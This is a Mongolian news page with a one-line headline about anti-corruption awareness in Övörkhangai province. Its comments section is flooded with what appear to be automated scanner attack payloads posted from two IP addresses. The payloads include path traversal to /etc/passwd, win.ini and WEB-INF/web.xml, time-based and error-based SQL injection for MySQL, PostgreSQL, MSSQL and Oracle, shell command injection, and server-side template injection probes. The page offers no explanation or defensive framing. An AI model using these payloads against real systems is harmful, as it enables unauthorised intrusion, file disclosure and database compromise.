ӨВӨРХАНГАЙ: Авлигын эсрэг соён гэгээрүүлэх ажлыг зохион байгуулж байна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-09 18:52:03
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 436 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 436 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 436 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 436 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 436 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 436 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 436 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',6)='i 185.234.72.114 436 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 436 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 185.234.72.114 436 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 436 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 185.234.72.114 436 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 436 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 436 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 436 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 185.234.72.114 436 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 436 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 436 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'"\(
 • ./../../../../../../Windows/win.ini 185.234.72.114 436 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456鎈'"\(
 • ../../../../../../Windows/win.ini 185.234.72.114 436 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1573889216')))>'0
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1358008221')))
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456/**/and/**/cast(md5('1289341899')as/**/int)>0
 • admin"and"o"="v 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and(select'1'from/**/cast(md5(1917714268)as/**/int))>'0
 • admin 185.234.72.114 436 өдөр

  extractvalue(1,concat(char(126),md5(1162022845)))
 • admin"and"v"="v 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1421972449)))and"
 • admin'and'm'='g 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1165941413)))and'
 • admin'and'h'='h 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',6)='l
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',0)='p
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('f',6)
 • admin 185.234.72.114 436 өдөр

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('a',0)
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • admin 185.234.72.114 436 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 436 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 436 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • admin 185.234.72.114 436 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 436 өдөр

  expr 940556889 + 844579688
 • admin 185.234.72.114 436 өдөр

  123456&set /A 980452669+904184423
 • admin 185.234.72.114 436 өдөр

  123456$(expr 951392749 + 987362155)
 • admin 185.234.72.114 436 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • admin 185.234.72.114 436 өдөр

  123456|expr 896848769 + 802625644
 • admin 185.234.72.114 436 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 436 өдөр

  123456 expr 841847058 + 826657423
 • admin 185.234.72.114 436 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 436 өдөр

  <%- 904517088+954763412 %>
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 436 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  #set($c=947966124+875249796)${c}$c
 • %u2215etc%u2215passwd 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • admin'"\( 185.234.72.114 436 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  ${(822954677+877617111)?c}
 • admin 185.234.72.114 436 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 436 өдөр

  '-var_dump(md5(197913849))-'
 • admin鎈'"\( 185.234.72.114 436 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  ${831789630+808201439}
 • admin 185.234.72.114 436 өдөр

  ${@var_dump(md5(779780877))};
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1784186620')))>'0 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  /*1*/{{955720444+852370131}}
 • /etc/passwd 185.234.72.114 436 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1410265059'))) 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 436 өдөр

  123456
 • admin/**/and/**/cast(md5('1680120209')as/**/int)>0 185.234.72.114 436 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456"and"s"="p
 • ./../../../../../../etc/passwd 185.234.72.114 436 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1716442565)as/**/int))>'0 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456"and"t"="t
 • extractvalue(1,concat(char(126),md5(1061103660))) 185.234.72.114 436 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and'a'='v
 • ../../../../../../etc/passwd 185.234.72.114 436 өдөр

  123456
 • expr 858303068 + 821444148 185.234.72.114 436 өдөр

  123456
 • '-var_dump(md5(233465339))-' 185.234.72.114 436 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1152090947)))and" 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456'and'w'='w
 • admin&set /A 868312879+832503786 185.234.72.114 436 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1120072426)))and' 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456/**/and+0=5
 • admin 185.234.72.114 436 өдөр

  123456
 • admin$(expr 968149664 + 881225692) 185.234.72.114 436 өдөр

  123456
 • <%- 821112291+911113776 %> 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456/**/and+2=2
 • ${820778645+978371994} 185.234.72.114 436 өдөр

  123456
 • #set($c=987252045+945569153)${c}$c 185.234.72.114 436 өдөр

  123456
 • qnrzoyzbxlpxtbtcffrr 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • ${@var_dump(md5(507265198))}; 185.234.72.114 436 өдөр

  123456
 • admin|expr 945476399 + 910403742 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  qnrzoyzbxlpxtbtcffrr
 • ${(887721122+967327369)?c} 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  ${917527749+887133432}
 • ${865613249+918970897} 185.234.72.114 436 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin expr 962719604 + 826564723 185.234.72.114 436 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 436 өдөр

  123456
 • /*1*/{{893804523+875835913}} 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin 185.234.72.114 436 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',6)='z
 • admin 194.163.191.42 437 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
 • admin 194.163.191.42 437 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('i',6)
 • admin 194.163.191.42 437 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
 • admin 194.163.191.42 437 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • admin 194.163.191.42 437 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 437 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • admin 194.163.191.42 437 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 437 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • admin 194.163.191.42 437 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 437 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../WEB-INF/web.xml 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml;admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • ../WEB-INF/web.xml;admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 437 өдөр

  123456"and"s"="e
 • ../WEB-INF/web.xml 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456"and"m"="m
 • admin 194.163.191.42 437 өдөр

  123456'and'i'='v
 • WEB-INF/web.xml;admin 194.163.191.42 437 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and't'='t
 • admin 194.163.191.42 437 өдөр

  123456/**/and+1=7
 • admin 194.163.191.42 437 өдөр

  123456/**/and+3=3
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 437 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 437 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 437 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 437 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 437 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 437 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 437 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 437 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 437 өдөр

  123456
 • admin'"\( 194.163.191.42 437 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 437 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 437 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 437 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 437 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 437 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1706053304')))>'0 194.163.191.42 437 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',6)='z 194.163.191.42 437 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1797852288'))) 194.163.191.42 437 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c 194.163.191.42 437 өдөр

  123456
 • admin/**/and/**/cast(md5('1371703906')as/**/int)>0 194.163.191.42 437 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 194.163.191.42 437 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1998912156)as/**/int))>'0 194.163.191.42 437 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 437 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1610973108))) 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  <%- 965462254+833785694 %>
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 437 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 194.163.191.42 437 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  #set($c=872837822+902606620)${c}$c
 • admin"and/**/extractvalue(1,concat(char(126),md5(1296514003)))and" 194.163.191.42 437 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 437 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  ${(801331968+862877128)?c}
 • admin'and/**/extractvalue(1,concat(char(126),md5(1561487584)))and' 194.163.191.42 437 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 194.163.191.42 437 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  ${956819832+804806725}
 • admin 194.163.191.42 437 өдөр

  123456'"\(
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 437 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 437 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 437 өдөр

  123456
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456鎈'"\(
 • /etc/passwd 194.163.191.42 437 өдөр

  123456
 • expr 888251325 + 850132505 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  /*1*/{{867939025+916965812}}
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1202457501')))>'0
 • admin&set /A 840487188+810220553 194.163.191.42 437 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1107144360')))
 • admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456/**/and/**/cast(md5('1047375032')as/**/int)>0
 • admin$(expr 894313821 + 934485742) 194.163.191.42 437 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • admin|expr 850674239 + 879456843 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 437 өдөр

  123456
 • admin expr 831773771 + 974009611 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and(select'1'from/**/cast(md5(1996440342)as/**/int))>'0
 • admin 194.163.191.42 437 өдөр

  extractvalue(1,concat(char(126),md5(1404353186)))
 • admin 194.163.191.42 437 өдөр

  expr 948575316 + 869054289
 • ../../../../../../etc/passwdadmin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1530336475)))and"
 • admin"and"r"="p 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1762522204)))and'
 • admin 194.163.191.42 437 өдөр

  123456
 • admin"and"g"="g 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456&set /A 830368267+893438358
 • ../../../../../../etc/passwd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456$(expr 962395669 + 867771943)
 • <%- 819976815+832467237 %> 194.163.191.42 437 өдөр

  123456
 • admin'and't'='p 194.163.191.42 437 өдөр

  123456
 • '-var_dump(md5(807467515))-' 194.163.191.42 437 өдөр

  123456
 • ${@var_dump(md5(586784485))}; 194.163.191.42 437 өдөр

  123456
 • #set($c=856322559+815569933)${c}$c 194.163.191.42 437 өдөр

  123456
 • admin'and'e'='e 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  ${853483409+805986923}
 • admin 194.163.191.42 437 өдөр

  123456|expr 882206100 + 873852672
 • admin 194.163.191.42 437 өдөр

  '-var_dump(md5(965716208))-'
 • admin 194.163.191.42 437 өдөр

  123456
 • ${(979452373+912428898)?c} 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  ${@var_dump(md5(486842844))};
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456 expr 888900320 + 919249319
 • ${899538183+985249077} 194.163.191.42 437 өдөр

  123456
 • hqcbuzlagjahdgumbrgo 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  hqcbuzlagjahdgumbrgo
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 437 өдөр

  123456
 • /*1*/{{909337347+826004618}} 194.163.191.42 437 өдөр

  123456
 • ${880967615+893527402} 194.163.191.42 437 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 437 өдөр

  123456
 • admin 194.163.191.42 437 өдөр

  123456